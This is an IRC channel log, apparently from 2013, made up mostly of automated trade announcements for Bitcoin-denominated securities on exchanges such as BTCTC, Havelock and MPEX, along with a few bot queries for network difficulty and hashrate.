Aug 11 20:48:36 [BTCTC] [DMS.MINING] 100 @ 0.00385 = 0.385 BTC [-] Aug 11 20:48:37 [BTCTC] [DMS.MINING] 300 @ 0.003821 = 1.1463 BTC [-] Aug 11 20:49:09 [HAVELOCK] [AM100] 8 @ 0.0349999 = 0.28 BTC [+] Aug 11 20:49:36 [BTCTC] [BTC-TRADING-PT] 7 @ 0.7264 = 5.0848 BTC [+] Aug 11 20:50:57 [HAVELOCK] [AM100] 100 @ 0.0349999 = 3.5 BTC [+] Aug 11 20:52:56 [BTCTC] [LABCOIN] 50 @ 0.001369 = 0.0685 BTC [-] Aug 11 20:52:57 [BTCTC] [LABCOIN] 400 @ 0.00137 = 0.548 BTC [+] Aug 11 20:55:24 [HAVELOCK] [AM100] 10 @ 0.0342001 = 0.342 BTC [-] Aug 11 20:56:35 [BTCTC] [DMS.SELLING] 17 @ 0.02479 = 0.4214 BTC [+] Aug 11 20:57:08 [HAVELOCK] [AM100] 1 @ 0.03449 BTC [+] Aug 11 20:57:11 [HAVELOCK] [AM100] 75 @ 0.0345 = 2.5875 BTC [+] Aug 11 20:58:25 [BTCTC] [DMS.MINING] 8 @ 0.003801 = 0.0304 BTC [-] Aug 11 20:59:09 [HAVELOCK] [AM100] 3 @ 0.0362 = 0.1086 BTC [+] Aug 11 20:59:20 [HAVELOCK] [AM100] 4 @ 0.0363 = 0.1452 BTC [+] Aug 11 21:00:11 [BTCTC] [DMS.MINING] 92 @ 0.003801 = 0.3497 BTC [-] Aug 11 21:01:15 [BTCTC] [BFMINES] 99 @ 0.00378 = 0.3742 BTC [+] Aug 11 21:01:17 [BTCTC] [DMS.MINING] 8 @ 0.003801 = 0.0304 BTC [-] Aug 11 21:01:18 [BTCTC] [BFMINES] 1 @ 0.002001 BTC [-] Aug 11 21:01:19 [BTCTC] [DMS.MINING] 1 @ 0.0038 BTC [-] Aug 11 21:01:20 [BTCTC] [DMS.MINING] 2 @ 0.0038 = 0.0076 BTC [-] Aug 11 21:01:22 [BTCTC] [DMS.MINING] 4 @ 0.0038 = 0.0152 BTC [-] Aug 11 21:01:23 [BTCTC] [DMS.MINING] 1 @ 0.0038 BTC [-] Aug 11 21:01:24 [BTCTC] [DMS.MINING] 10 @ 0.0038 = 0.038 BTC [-] Aug 11 21:01:59 [MPEX] [S.MPOE] 4863 @ 0.00085 = 4.1336 BTC [+] Aug 11 21:02:54 [HAVELOCK] [AM100] 69 @ 0.0346 = 2.3874 BTC [-] Aug 11 21:03:15 [BTCTC] [BTCGARDEN] 28 @ 0.01579 = 0.4421 BTC [-] Aug 11 21:03:16 [BTCTC] [BTCGARDEN] 10 @ 0.01578 = 0.1578 BTC [-] Aug 11 21:03:17 [BTCTC] [BTCGARDEN] 15 @ 0.01578 = 0.2367 BTC [-] Aug 11 21:03:19 [BTCTC] [BTCGARDEN] 47 @ 0.01577 = 0.7412 BTC [-] Aug 11 21:03:22 [HAVELOCK] [AM100] 3 @ 0.0346 = 0.1038 BTC [-] Aug 11 21:03:25 [HAVELOCK] [AM100] 1 @ 0.0345 BTC [-] Aug 11 21:03:38 [HAVELOCK] [AM100] 3 @ 0.0345 = 0.1035 BTC [-] Aug 11 21:03:44 [BTCTC] [COGNITIVE] 1 @ 0.312 BTC [-] Aug 11 21:04:54 [HAVELOCK] [AM100] 1 @ 0.0345 BTC [-] Aug 11 21:08:39 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00189 = 0.0038 BTC [-] Aug 11 21:11:43 [BTCTC] [TAT.ASICMINER] 11 @ 0.03763 = 0.4139 BTC [-] Aug 11 21:13:50 [BTCTC] [BTCGARDEN] 15 @ 0.01578 = 0.2367 BTC [+] Aug 11 21:15:18 [BTCTC] [DMS.MINING] 10 @ 0.00396 = 0.0396 BTC [+] Aug 11 21:15:47 [BTCTC] [DMS.MINING] 8 @ 0.00397 = 0.0318 BTC [+] Aug 11 21:16:15 [BTCTC] [DMS.MINING] 10 @ 0.00398 = 0.0398 BTC [+] Aug 11 21:16:39 [BTCTC] [DMS.MINING] 10 @ 0.00399 = 0.0399 BTC [+] Aug 11 21:17:01 [BTCTC] [DMS.MINING] 58 @ 0.003997 = 0.2318 BTC [+] Aug 11 21:18:36 [BTCTC] [DMS.MINING] 20 @ 0.003997 = 0.0799 BTC [+] Aug 11 21:18:37 [BTCTC] [DMS.MINING] 2 @ 0.003998 = 0.008 BTC [+] Aug 11 21:19:42 [BTCTC] [DMS.SELLING] 17 @ 0.02489 = 0.4231 BTC [+] Aug 11 21:22:32 [BTCTC] [DMS.PURCHASE] 25 @ 0.02806 = 0.7015 BTC [-] Aug 11 21:23:15 [HAVELOCK] [AM100] 1 @ 0.0359 BTC [+] Aug 11 21:25:01 https://bitcointalk.org/index.php?topic=271831.0 Aug 11 21:25:03 lollercopter Aug 11 21:25:10 [ANNOUNCE] Android key rotation Aug 11 21:31:20 [BTCTC] [LABCOIN] 30 @ 0.001356 = 0.0407 BTC [-] Aug 11 21:31:22 [BTCTC] [LABCOIN] 50 @ 0.001355 = 0.0678 BTC [-] Aug 11 21:31:22 [BTCTC] [LABCOIN] 200 @ 0.001345 = 0.269 BTC [-] Aug 11 21:31:23 [BTCTC] [LABCOIN] 50 @ 0.001326 = 0.0663 BTC [-] Aug 11 21:31:25 [BTCTC] [LABCOIN] 195 @ 0.001325 = 0.2584 BTC [-] Aug 11 21:32:32 [MPEX] [S.MPOE] 5900 @ 0.00084885 = 5.0082 BTC [-] Aug 11 21:32:33 [MPEX] [S.MPOE] 6300 @ 0.00084798 = 5.3423 BTC [-] Aug 11 21:33:09 [BTCTC] [ACTIVEMINING] 68 @ 0.005286 = 0.3594 BTC [-] Aug 11 21:33:10 [BTCTC] [ACTIVEMINING] 50 @ 0.005266 = 0.2633 BTC [-] Aug 11 21:33:11 [BTCTC] [ACTIVEMINING] 20 @ 0.005206 = 0.1041 BTC [-] Aug 11 21:33:13 [BTCTC] [ACTIVEMINING] 62 @ 0.005205 = 0.3227 BTC [-] Aug 11 21:33:39 [HAVELOCK] [XBOND] 216 @ 0.00104699 = 0.2261 BTC [+] Aug 11 21:35:36 [BTCTC] [DMS.MINING] 4 @ 0.003752 = 0.015 BTC [-] Aug 11 21:35:37 [BTCTC] [DMS.MINING] 20 @ 0.003751 = 0.075 BTC [-] Aug 11 21:35:39 [BTCTC] [DMS.MINING] 15 @ 0.00375 = 0.0563 BTC [-] Aug 11 21:35:40 [BTCTC] [DMS.MINING] 500 @ 0.003722 = 1.861 BTC [-] Aug 11 21:35:41 [BTCTC] [DMS.MINING] 150 @ 0.003715 = 0.5573 BTC [-] Aug 11 21:35:42 [BTCTC] [DMS.MINING] 138 @ 0.003712 = 0.5123 BTC [-] Aug 11 21:35:43 [BTCTC] [DMS.MINING] 528 @ 0.003711 = 1.9594 BTC [-] Aug 11 21:36:51 [BTCTC] [DMS.MINING] 472 @ 0.003711 = 1.7516 BTC [-] Aug 11 21:36:53 [BTCTC] [DMS.MINING] 1 @ 0.0036 BTC [-] Aug 11 21:36:54 [BTCTC] [DMS.MINING] 365 @ 0.003416 = 1.2468 BTC [-] Aug 11 21:36:55 [BTCTC] [DMS.MINING] 162 @ 0.003415 = 0.5532 BTC [-] Aug 11 21:38:47 [BTCTC] [LABCOIN] 3 @ 0.001357 = 0.0041 BTC [+] Aug 11 21:38:47 [BTCTC] [LABCOIN] 2 @ 0.001369 = 0.0027 BTC [+] Aug 11 21:40:43 [BTCTC] [DMS.MINING] 20 @ 0.003712 = 0.0742 BTC [+] Aug 11 21:42:07 [MPEX] [S.MPOE] 4789 @ 0.00085 = 4.0707 BTC [+] Aug 11 21:46:40 [BTCTC] [NASTY-PT] 10 @ 0.00414 = 0.0414 BTC [+] Aug 11 21:47:23 [BTCTC] [BFMINES] 60 @ 0.003849 = 0.2309 BTC [+] Aug 11 21:48:56 [BTCTC] [DMS.PURCHASE] 1 @ 0.02806 BTC [-] Aug 11 21:50:42 [BTCTC] [DMS.PURCHASE] 60 @ 0.02806 = 1.6836 BTC [-] Aug 11 21:52:53 [HAVELOCK] [XBOND] 1000 @ 0.001047 = 1.047 BTC [+] Aug 11 22:04:47 [BTCTC] [LABCOIN] 2 @ 0.001365 = 0.0027 BTC [-] Aug 11 22:04:48 [BTCTC] [LABCOIN] 20 @ 0.001366 = 0.0273 BTC [+] Aug 11 22:04:50 [BTCTC] [LABCOIN] 15 @ 0.001387 = 0.0208 BTC [+] Aug 11 22:04:51 [BTCTC] [LABCOIN] 120 @ 0.001388 = 0.1666 BTC [+] Aug 11 22:04:52 [BTCTC] [LABCOIN] 1000 @ 0.00139 = 1.39 BTC [+] Aug 11 22:04:52 [BTCTC] [LABCOIN] 4000 @ 0.001391 = 5.564 BTC [+] Aug 11 22:04:53 [BTCTC] [LABCOIN] 1103 @ 0.001392 = 1.5354 BTC [+] Aug 11 22:05:31 [HAVELOCK] [AM100] 108 @ 0.0342015 = 3.6938 BTC [-] Aug 11 22:05:33 [HAVELOCK] [AM100] 82 @ 0.0342015 = 2.8045 BTC [-] Aug 11 22:05:36 [HAVELOCK] [AM100] 26 @ 0.0342015 = 0.8892 BTC [-] Aug 11 22:06:02 [HAVELOCK] [XBOND] 225 @ 0.001047 = 0.2356 BTC [+] Aug 11 22:06:06 [HAVELOCK] [AM100] 3 @ 0.03420131 = 0.1026 BTC [-] Aug 11 22:06:09 [HAVELOCK] [AM100] 23 @ 0.0342 = 0.7866 BTC [-] Aug 11 22:06:37 [BTCTC] [LABCOIN] 8 @ 0.001379 = 0.011 BTC [-] Aug 11 22:07:02 [BTCTC] [DMS.SELLING] 10 @ 0.02488 = 0.2488 BTC [-] Aug 11 22:07:13 [HAVELOCK] [XBOND] 184 @ 0.00104699 = 0.1926 BTC [-] Aug 11 22:09:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.03882 = 0.0776 BTC [+] Aug 11 22:11:23 [HAVELOCK] [XBOND] 41 @ 0.0010417 = 0.0427 BTC [-] Aug 11 22:11:28 [MPEX] [S.MPOE] 5100 @ 0.00085375 = 4.3541 BTC [+] Aug 11 22:13:12 [BTCTC] [LABCOIN] 20 @ 0.001358 = 0.0272 BTC [-] Aug 11 22:13:14 [BTCTC] [LABCOIN] 100 @ 0.001356 = 0.1356 BTC [-] Aug 11 22:13:15 [BTCTC] [LABCOIN] 800 @ 0.001355 = 1.084 BTC [-] Aug 11 22:13:16 [BTCTC] [LABCOIN] 50 @ 0.001341 = 0.0671 BTC [-] Aug 11 22:13:23 [BTCTC] [LABCOIN] 30 @ 0.001341 = 0.0402 BTC [-] Aug 11 22:13:47 [HAVELOCK] [AM100] 1 @ 0.0359 BTC [+] Aug 11 22:19:38 [HAVELOCK] [SDSTM] 11 @ 0.0055291 = 0.0608 BTC [-] Aug 11 22:24:09 [BTCTC] [TAT.MINIGAME] 1 @ 0.000239 BTC [-] Aug 11 22:24:49 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001899 BTC [+] Aug 11 22:25:41 [BTCTC] [ACTIVEMINING] 68 @ 0.005356 = 0.3642 BTC [+] Aug 11 22:25:42 [BTCTC] [ACTIVEMINING] 4 @ 0.005357 = 0.0214 BTC [+] Aug 11 22:25:43 [BTCTC] [ACTIVEMINING] 5 @ 0.005362 = 0.0268 BTC [+] Aug 11 22:25:44 [BTCTC] [ACTIVEMINING] 50 @ 0.005363 = 0.2682 BTC [+] Aug 11 22:25:45 [BTCTC] [ACTIVEMINING] 2 @ 0.005499 = 0.011 BTC [+] Aug 11 22:25:46 [BTCTC] [ACTIVEMINING] 10 @ 0.0055 = 0.055 BTC [+] Aug 11 22:28:35 [BTCTC] [LTC-ATF.B2] 1 @ 0.01043 BTC [+] Aug 11 22:30:17 [BTCTC] [LABCOIN] 2 @ 0.00136 = 0.0027 BTC [+] Aug 11 22:30:18 [BTCTC] [LABCOIN] 20 @ 0.001361 = 0.0272 BTC [+] Aug 11 22:35:22 [BTCTC] [DMS.SELLING] 1 @ 0.02488 BTC [-] Aug 11 22:38:26 [BTCTC] [BITVPS] 87 @ 0.002287 = 0.199 BTC [+] Aug 11 22:43:36 [MPEX] [S.MPOE] 1300 @ 0.0008553 = 1.1119 BTC [+] Aug 11 22:43:37 [MPEX] [S.MPOE] 13561 @ 0.00085018 = 11.5293 BTC [-] Aug 11 22:53:01 [BTCTC] [ASICMINER-PT] 1 @ 3.86 BTC [+] Aug 11 22:55:12 [BTCTC] [BFMINES] 29 @ 0.002015 = 0.0584 BTC [-] Aug 11 22:55:24 [BTCTC] [LTC-ATF.B2] 2 @ 0.01043 = 0.0209 BTC [+] Aug 11 22:57:02 [HAVELOCK] [XBOND] 222 @ 0.00104699 = 0.2324 BTC [+] Aug 11 22:57:05 [HAVELOCK] [XBOND] 10 @ 0.0010469 = 0.0105 BTC [-] Aug 11 22:59:26 [HAVELOCK] [XBOND] 212 @ 0.0010417 = 0.2208 BTC [-] Aug 11 22:59:47 [BTCTC] [DMS.MINING] 20 @ 0.003453 = 0.0691 BTC [-] Aug 11 22:59:49 [BTCTC] [DMS.MINING] 35 @ 0.003452 = 0.1208 BTC [-] Aug 11 22:59:50 [BTCTC] [DMS.MINING] 25 @ 0.00345 = 0.0863 BTC [-] Aug 11 23:04:53 [BTCTC] [DMS.PURCHASE] 60 @ 0.02806 = 1.6836 BTC [-] Aug 11 23:06:57 [BTCTC] [LABCOIN] 30 @ 0.001354 = 0.0406 BTC [-] Aug 11 23:06:59 [BTCTC] [LABCOIN] 50 @ 0.001351 = 0.0676 BTC [-] Aug 11 23:07:00 [BTCTC] [LABCOIN] 504 @ 0.00134 = 0.6754 BTC [-] Aug 11 23:07:58 [HAVELOCK] [XBOND] 278 @ 0.00104699 = 0.2911 BTC [+] Aug 11 23:08:01 [HAVELOCK] [XBOND] 7341 @ 0.001047 = 7.686 BTC [+] Aug 11 23:08:52 [HAVELOCK] [XBOND] 22 @ 0.001047 = 0.023 BTC [+] Aug 11 23:09:00 ;;stats Aug 11 23:09:01 I have 21 registered users with 27 registered hostmasks; 1 owner and 0 admins. Aug 11 23:09:04 ;;netstats Aug 11 23:09:05 Error: "netstats" is not a valid command. Aug 11 23:09:15 ;;bc.stats Aug 11 23:09:15 Error: "bc.stats" is not a valid command. Aug 11 23:09:18 ;;bc,stats Aug 11 23:09:21 Current Blocks: 251591 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 408 blocks | Next Difficulty In About: 1 day, 21 hours, 7 minutes, and 27 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Aug 11 23:10:57 [BTCTC] [DMS.PURCHASE] 15 @ 0.02806 = 0.4209 BTC [-] Aug 11 23:11:31 [BTCTC] [ACTIVEMINING] 11 @ 0.005491 = 0.0604 BTC [-] Aug 11 23:15:33 [HAVELOCK] [AM100] 108 @ 0.0342001 = 3.6936 BTC [-] Aug 11 23:15:35 [HAVELOCK] [AM100] 127 @ 0.0342 = 4.3434 BTC [-] Aug 11 23:15:38 [HAVELOCK] [AM100] 3 @ 0.034 = 0.102 BTC [-] Aug 11 23:15:59 [HAVELOCK] [AM100] 1 @ 0.03400001 BTC [+] Aug 11 23:21:23 [HAVELOCK] [AM100] 108 @ 0.0340001 = 3.672 BTC [+] Aug 11 23:21:42 [MPEX] [S.MPOE] 3150 @ 0.00084869 = 2.6734 BTC [-] Aug 11 23:21:44 [MPEX] [S.MPOE] 13545 @ 0.00084701 = 11.4728 BTC [-] Aug 11 23:21:44 [MPEX] [S.MPOE] 3300 @ 0.00084375 = 2.7844 BTC [-] Aug 11 23:22:20 [BTCTC] [LABCOIN] 4 @ 0.001349 = 0.0054 BTC [+] Aug 11 23:22:21 [BTCTC] [LABCOIN] 37 @ 0.00135 = 0.05 BTC [+] Aug 11 23:22:44 [HAVELOCK] [AM100] 15 @ 0.03400001 = 0.51 BTC [-] Aug 11 23:27:55 [HAVELOCK] [AM100] 2 @ 0.03400001 = 0.068 BTC [-] Aug 11 23:33:36 [BTCTC] [LABCOIN] 30 @ 0.001358 = 0.0407 BTC [+] Aug 11 23:33:37 [BTCTC] [LABCOIN] 235 @ 0.001357 = 0.3189 BTC [-] Aug 11 23:33:39 [BTCTC] [LABCOIN] 70 @ 0.001355 = 0.0949 BTC [-] Aug 11 23:33:40 [BTCTC] [LABCOIN] 930 @ 0.001351 = 1.2564 BTC [-] Aug 11 23:34:56 [BTCTC] [ASICMINER-PT] 1 @ 3.805 BTC [-] Aug 11 23:37:56 [HAVELOCK] [AM100] 100 @ 0.03400001 = 3.4 BTC [-] Aug 11 23:38:05 [HAVELOCK] [AM100] 10 @ 0.03400001 = 0.34 BTC [-] Aug 11 23:38:10 [BTCTC] [LABCOIN] 30 @ 0.00136 = 0.0408 BTC [+] Aug 11 23:38:11 [BTCTC] [LABCOIN] 193 @ 0.001359 = 0.2623 BTC [-] Aug 11 23:38:13 [BTCTC] [LABCOIN] 50 @ 0.001355 = 0.0678 BTC [-] Aug 11 23:38:14 [BTCTC] [LABCOIN] 70 @ 0.001351 = 0.0946 BTC [-] Aug 11 23:38:15 [HAVELOCK] [AM100] 1 @ 0.03400001 BTC [-] Aug 11 23:39:11 [HAVELOCK] [AM1] 1 @ 3.751 BTC [-] Aug 11 23:39:30 [HAVELOCK] [AM100] 49 @ 0.03400001 = 1.666 BTC [-] Aug 11 23:39:34 [HAVELOCK] [AM100] 11 @ 0.0340002 = 0.374 BTC [+] Aug 11 23:39:35 [HAVELOCK] [AM100] 15 @ 0.0345001 = 0.5175 BTC [+] Aug 11 23:40:30 [HAVELOCK] [AM100] 1 @ 0.0359 BTC [+] Aug 11 23:41:02 [HAVELOCK] [AM100] 4 @ 0.0363 = 0.1452 BTC [+] Aug 11 23:41:04 [HAVELOCK] [AM100] 26 @ 0.0363998 = 0.9464 BTC [+] Aug 11 23:41:11 [HAVELOCK] [AM100] 2 @ 0.0362999 = 0.0726 BTC [-] Aug 11 23:43:05 [BTCTC] [TAT.VIRTUALMINE] 1294 @ 0.001542 = 1.9953 BTC [-] Aug 11 23:43:45 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001541 = 0.1541 BTC [-] Aug 11 23:43:46 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001539 = 0.0031 BTC [-] Aug 11 23:43:48 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001535 = 0.1535 BTC [-] Aug 11 23:43:49 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001519 BTC [-] Aug 11 23:43:50 [BTCTC] [TAT.VIRTUALMINE] 378 @ 0.001514 = 0.5723 BTC [-] Aug 11 23:44:55 [BTCTC] [TAT.ASICMINER] 54 @ 0.03761 = 2.0309 BTC [-] Aug 11 23:44:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.0376 = 0.376 BTC [-] Aug 11 23:44:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.03751 BTC [-] Aug 11 23:44:58 [BTCTC] [TAT.ASICMINER] 6 @ 0.0375 = 0.225 BTC [-] Aug 11 23:44:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.0372 = 0.0744 BTC [-] Aug 11 23:45:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.03711 = 0.1484 BTC [-] Aug 11 23:45:01 [BTCTC] [TAT.ASICMINER] 18 @ 0.0371 = 0.6678 BTC [-] Aug 11 23:45:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.0371 = 0.0742 BTC [-] Aug 11 23:45:12 [BTCTC] [TAT.ASICMINER] 13 @ 0.03704 = 0.4815 BTC [-] Aug 11 23:45:13 [BTCTC] [TAT.ASICMINER] 40 @ 0.03703 = 1.4812 BTC [-] Aug 11 23:46:18 <[\\\]> .d Aug 11 23:46:19 37392766.13647 | Next Diff in 401 blocks | Estimated Change: 33.3031% in 1d 20h 33m 10s Aug 11 23:49:05 [BTCTC] [LABCOIN] 49 @ 0.001349 = 0.0661 BTC [-] Aug 11 23:49:06 [BTCTC] [LABCOIN] 392 @ 0.00135 = 0.5292 BTC [+] Aug 11 23:54:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.03851 BTC [+] Aug 11 23:56:59 [BTCTC] [DMS.PURCHASE] 5 @ 0.02806 = 0.1403 BTC [-] Aug 11 23:57:29 [HAVELOCK] [AM100] 4 @ 0.0341 = 0.1364 BTC [-] Aug 11 23:57:30 [HAVELOCK] [AM100] 5 @ 0.034 = 0.17 BTC [-] Aug 11 23:57:33 [HAVELOCK] [AM100] 20 @ 0.0338 = 0.676 BTC [-] Aug 11 23:57:35 [HAVELOCK] [AM100] 1 @ 0.03375 BTC [-] Aug 11 23:57:37 [HAVELOCK] [AM100] 20 @ 0.03372 = 0.6744 BTC [-] Aug 11 23:57:40 [HAVELOCK] [XBOND] 4038 @ 0.001047 = 4.2278 BTC [+] Aug 12 00:06:57 [MPEX] [S.MPOE] 3600 @ 0.00084146 = 3.0293 BTC [-] Aug 12 00:13:30 [BTCTC] [NASTY-PT] 5 @ 0.003879 = 0.0194 BTC [-] Aug 12 00:13:32 [BTCTC] [NASTY-PT] 10 @ 0.003881 = 0.0388 BTC [+] Aug 12 00:13:35 [BTCTC] [NASTY-PT] 18 @ 0.003882 = 0.0699 BTC [+] Aug 12 00:13:38 [BTCTC] [NASTY-PT] 42 @ 0.003887 = 0.1633 BTC [+] Aug 12 00:13:40 [BTCTC] [NASTY-PT] 33 @ 0.003893 = 0.1285 BTC [+] Aug 12 00:13:42 [BTCTC] [NASTY-PT] 38 @ 0.003896 = 0.148 BTC [+] Aug 12 00:13:57 [BTCTC] [BTCGARDEN] 1 @ 0.01594 BTC [+] Aug 12 00:14:37 [BTCTC] [NASTY-PT] 19 @ 0.00391 = 0.0743 BTC [+] Aug 12 00:14:42 [BTCTC] [NASTY-PT] 32 @ 0.00393 = 0.1258 BTC [+] Aug 12 00:14:44 [BTCTC] [NASTY-PT] 47 @ 0.00398 = 0.1871 BTC [+] Aug 12 00:16:25 [BTCTC] [DMS.MINING] 1 @ 0.0035 BTC [+] Aug 12 00:16:39 [BTCTC] [DMS.PURCHASE] 11 @ 0.02806 = 0.3087 BTC [-] Aug 12 00:17:32 [BTCTC] [BTCGARDEN] 20 @ 0.01582 = 0.3164 BTC [-] Aug 12 00:17:33 [BTCTC] [LABCOIN] 59 @ 0.00136 = 0.0802 BTC [+] Aug 12 00:17:34 [BTCTC] [LABCOIN] 100 @ 0.001345 = 0.1345 BTC [-] Aug 12 00:17:35 [BTCTC] [BTCGARDEN] 100 @ 0.01581 = 1.581 BTC [-] Aug 12 00:17:37 [BTCTC] [LABCOIN] 50 @ 0.001344 = 0.0672 BTC [-] Aug 12 00:17:38 [BTCTC] [BTCGARDEN] 50 @ 0.0158 = 0.79 BTC [-] Aug 12 00:17:38 [BTCTC] [LABCOIN] 100 @ 0.001342 = 0.1342 BTC [-] Aug 12 00:17:39 [BTCTC] [BTCGARDEN] 100 @ 0.01578 = 1.578 BTC [-] Aug 12 00:17:40 [BTCTC] [LABCOIN] 246 @ 0.00134 = 0.3296 BTC [-] Aug 12 00:17:41 [BTCTC] [BTCGARDEN] 47 @ 0.01578 = 0.7417 BTC [-] Aug 12 00:17:42 [BTCTC] [LABCOIN] 362 @ 0.001337 = 0.484 BTC [-] Aug 12 00:17:43 [BTCTC] [LABCOIN] 400 @ 0.001336 = 0.5344 BTC [-] Aug 12 00:17:44 [BTCTC] [BTCGARDEN] 113 @ 0.01577 = 1.782 BTC [-] Aug 12 00:17:45 [BTCTC] [LABCOIN] 1183 @ 0.001335 = 1.5793 BTC [-] Aug 12 00:17:46 [BTCTC] [BTCGARDEN] 231 @ 0.0157 = 3.6267 BTC [-] Aug 12 00:18:05 [BTCTC] [LABCOIN] 30 @ 0.001377 = 0.0413 BTC [+] Aug 12 00:18:05 [BTCTC] [LABCOIN] 20 @ 0.001378 = 0.0276 BTC [+] Aug 12 00:19:10 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001521 = 0.1521 BTC [+] Aug 12 00:19:11 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00152 BTC [-] Aug 12 00:19:13 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001518 BTC [-] Aug 12 00:19:14 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001516 BTC [-] Aug 12 00:19:15 [BTCTC] [TAT.VIRTUALMINE] 2084 @ 0.001514 = 3.1552 BTC [-] Aug 12 00:19:16 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00151 BTC [-] Aug 12 00:19:17 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001455 BTC [-] Aug 12 00:19:19 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.001406 = 0.0141 BTC [-] Aug 12 00:19:20 [BTCTC] [TAT.VIRTUALMINE] 2801 @ 0.001405 = 3.9354 BTC [-] Aug 12 00:19:43 [BTCTC] [LABCOIN] 1 @ 0.001372 BTC [-] Aug 12 00:20:32 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001882 BTC [+] Aug 12 00:20:33 [BTCTC] [TAT.VIRTUALMINE] 99 @ 0.001883 = 0.1864 BTC [+] Aug 12 00:21:19 [BTCTC] [TAT.VIRTUALMINE] 400 @ 0.001882 = 0.7528 BTC [-] Aug 12 00:22:12 [BTCTC] [TAT.VIRTUALMINE] 2199 @ 0.001405 = 3.0896 BTC [-] Aug 12 00:22:13 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.0014 = 0.28 BTC [-] Aug 12 00:22:15 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001233 BTC [-] Aug 12 00:22:35 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.001882 = 0.5646 BTC [+] Aug 12 00:24:53 [BTCTC] [TAT.ASICMINER] 6 @ 0.0382 = 0.2292 BTC [-] Aug 12 00:26:39 [BTCTC] [DMS.SELLING] 32 @ 0.0245 = 0.784 BTC [-] Aug 12 00:26:41 [BTCTC] [DMS.MINING] 32 @ 0.0035 = 0.112 BTC [+] Aug 12 00:26:58 [BTCTC] [DMS.MINING] 17 @ 0.0035 = 0.0595 BTC [+] Aug 12 00:28:42 [BTCTC] [DMS.MINING] 25 @ 0.003599 = 0.09 BTC [+] Aug 12 00:30:56 [BTCTC] [ASICMINER-PT] 1 @ 3.818 BTC [+] Aug 12 00:35:19 [HAVELOCK] [XBOND] 31 @ 0.0010401 = 0.0322 BTC [-] Aug 12 00:36:56 [BTCTC] [DMS.SELLING] 48 @ 0.02402 = 1.153 BTC [-] Aug 12 00:36:58 [BTCTC] [DMS.SELLING] 50 @ 0.024 = 1.2 BTC [-] Aug 12 00:36:59 [BTCTC] [DMS.SELLING] 100 @ 0.02395 = 2.395 BTC [-] Aug 12 00:37:01 [BTCTC] [DMS.SELLING] 88 @ 0.02394 = 2.1067 BTC [-] Aug 12 00:37:43 [HAVELOCK] [AM100] 16 @ 0.0340007 = 0.544 BTC [+] Aug 12 00:37:56 [HAVELOCK] [XBOND] 13 @ 0.00104 = 0.0135 BTC [-] Aug 12 00:41:34 [HAVELOCK] [HIM] 1 @ 0.124 BTC [-] Aug 12 00:42:03 [HAVELOCK] [HIM] 11 @ 0.1211 = 1.3321 BTC [-] Aug 12 00:42:25 [HAVELOCK] [HIM] 3 @ 0.12100001 = 0.363 BTC [-] Aug 12 00:44:07 [MPEX] [S.MPOE] 11955 @ 0.00084146 = 10.0597 BTC [-] Aug 12 00:49:47 [BTCTC] [DMS.MINING] 1 @ 0.00348 BTC [-] Aug 12 00:50:09 [HAVELOCK] [XBOND] 169 @ 0.0010401 = 0.1758 BTC [+] Aug 12 00:50:15 [BTCTC] [DMS.MINING] 1 @ 0.00345 BTC [-] Aug 12 00:50:18 [BTCTC] [DMS.MINING] 2 @ 0.00359 = 0.0072 BTC [+] Aug 12 00:53:21 [HAVELOCK] [AM100] 4 @ 0.0362 = 0.1448 BTC [+] Aug 12 00:53:26 [HAVELOCK] [XBOND] 2 @ 0.00104 = 0.0021 BTC [-] Aug 12 00:54:15 [HAVELOCK] [XBOND] 378 @ 0.0010351 = 0.3913 BTC [-] Aug 12 00:55:06 [HAVELOCK] [XBOND] 30 @ 0.0010351 = 0.0311 BTC [-] Aug 12 01:04:11 [BTCTC] [DMS.SELLING] 12 @ 0.02394 = 0.2873 BTC [-] Aug 12 01:04:33 [BTCTC] [DMS.SELLING] 30 @ 0.0236 = 0.708 BTC [-] Aug 12 01:04:35 [BTCTC] [DMS.SELLING] 9 @ 0.0236 = 0.2124 BTC [-] Aug 12 01:05:22 [BTCTC] [DMS.MINING] 33 @ 0.00345 = 0.1139 BTC [-] Aug 12 01:11:04 ;;bc,stats Aug 12 01:11:07 Current Blocks: 251615 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 384 blocks | Next Difficulty In About: 1 day, 19 hours, 3 minutes, and 55 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Aug 12 01:11:46 [MPEX] [S.MPOE] 8600 @ 0.00084487 = 7.2659 BTC [+] Aug 12 01:15:16 ;;estimate Aug 12 01:15:17 Next difficulty estimate | None based on data since last change | 55371338.3074 based on data for last three days Aug 12 01:15:27 ;;nethash Aug 12 01:15:28 396369.526729 Aug 12 01:16:43 [BTCTC] [ACTIVEMINING] 2 @ 0.005494 = 0.011 BTC [+] Aug 12 01:17:18 [BTCTC] [ACTIVEMINING] 8 @ 0.005495 = 0.044 BTC [+] Aug 12 01:22:58 [BTCTC] [BTCGARDEN] 20 @ 0.01572 = 0.3144 BTC [+] Aug 12 01:25:03 [HAVELOCK] [AM100] 13 @ 0.0340007 = 0.442 BTC [-] Aug 12 01:26:29 [BTCTC] [ACTIVEMINING] 10 @ 0.005494 = 0.0549 BTC 